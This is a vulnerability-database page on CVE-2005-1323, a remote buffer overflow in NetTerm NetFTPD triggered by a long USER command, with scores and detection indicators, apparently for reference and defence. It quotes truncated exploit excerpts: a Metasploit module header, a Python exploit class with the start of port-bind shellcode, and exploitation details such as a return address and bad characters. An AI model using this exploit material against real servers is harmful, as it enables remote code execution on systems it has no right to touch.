CVE-2005-1323
published 2005-05-02CVE-2005-1323: Buffer overflow in NetFtpd for NetTerm 5.1.1 and earlier allows remote attackers to execute arbitrary code via a long USER command.
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
63.07%
99.1th percentile
Buffer overflow in NetFtpd for NetTerm 5.1.1 and earlier allows remote attackers to execute arbitrary code via a long USER command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intersoft | netterm | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x0a\x20\x0d
- →Detect exploitation attempts by monitoring FTP traffic for oversized USER commands (buffer size ~1014 bytes or larger) sent to NetTerm NetFTPD. ↗
- →Check FTP banner for 'NetTerm FTP server' string to identify vulnerable instances; the Metasploit module uses this banner check to confirm vulnerability. ↗
- →After successful exploitation, watch for outbound TCP connections to port 4444 from the FTP server process (netftpd.exe), indicating a reverse/bind shell. ↗
- →The exploit payload uses a stack adjustment of -3500 bytes; anomalous stack pointer manipulation in netftpd.exe may indicate exploitation. ↗
- ·The universal return address (0x0040df98) targets netftpd.exe directly and applies across multiple versions; other return addresses are DLL-specific to particular Windows OS versions. ↗
- ·The exploit payload space is limited to 1000 bytes and must avoid bad characters \x00, \x0a, \x20, \x0d; shellcode must be encoded accordingly. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2005-1323 NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)
NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)
---
##
# $Id: netterm_netftpd_user.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'NetTerm NetFTPD USER Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the NetTerm NetFTPD
application. This package is part of the NetTerm package.
This module uses the USER command to trigger the overflow.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10559 $',
'References' =>
[
[ 'CVE', '2005-1323'],
Exploit-DB
TCP TIMESTAMPS - Denial of Service
exploitdb·2005-05-21
CVE-2005-0356 TCP TIMESTAMPS - Denial of Service
TCP TIMESTAMPS - Denial of Service
---
/*
* TCP does not adequately validate segments before updating timestamp value
* http://www.kb.cert.org/vuls/id/637934
*
* RFC-1323 (TCP Extensions for High Performance)
*
* 4.2.1 defines how the PAWS algorithm should drop packets with invalid
* timestamp options:
*
* R1) If there is a Timestamps option in the arriving segment
* and SEG.TSval = TSrecent and SEG.SEQ th_seq, tp->last_ack_sent)) {
* tp->ts_recent_age = ticks;
* tp->ts_recent = to.to_tsval;
* }
*
* The problem here is that the packet the timestamp is accepted from doesn't
* need to have a valid th_seq or th_ack. This point of execution is reached
* for packets with arbitrary th_ack values and th_seq values of half the
* possible value range, because the first 'if (todrop > tlen)' check
Exploit-DB
NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
exploitdb·2005-04-26
CVE-2005-1323 NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
---
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time
class warftpd:
def __init__(self, host, port):
self.host = host
self.port = port
self.bsize = 512
self.ebpaddr = 0xcacacaca
self.retaddr = 0xdeadbeef
self.sctype = 'findskt'
self.scport = None
def setebpaddr(self, addr):
self.ebpaddr = addr
def setretaddr(self, addr):
self.retaddr = addr
def setbsize(self, size):
self.bsize = size
def setsctype(self, type):
self.sctype = type
def setscport(self, port):
self.scport = port
def genbuffer(self):
##
# Alpha port bind 4444, thanx metasploit
##
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\
Metasploit
NetTerm NetFTPD USER Buffer Overflow
metasploit
NetTerm NetFTPD USER Buffer Overflow
NetTerm NetFTPD USER Buffer Overflow
This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.
No writeups or analysis indexed.
http://secunia.com/advisories/15140http://www.osvdb.org/15865http://www.securenetterm.com/html/what_s_new.htmlhttp://www.securityfocus.com/archive/1/396959http://www.securityfocus.com/bid/13396http://www.vupen.com/english/advisories/2005/0407https://exchange.xforce.ibmcloud.com/vulnerabilities/20285http://secunia.com/advisories/15140http://www.osvdb.org/15865http://www.securenetterm.com/html/what_s_new.htmlhttp://www.securityfocus.com/archive/1/396959http://www.securityfocus.com/bid/13396http://www.vupen.com/english/advisories/2005/0407https://exchange.xforce.ibmcloud.com/vulnerabilities/20285
2005-05-02
Published